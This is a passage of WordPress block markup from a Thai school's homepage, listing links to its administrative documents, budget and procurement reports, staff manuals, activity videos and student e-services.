data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" 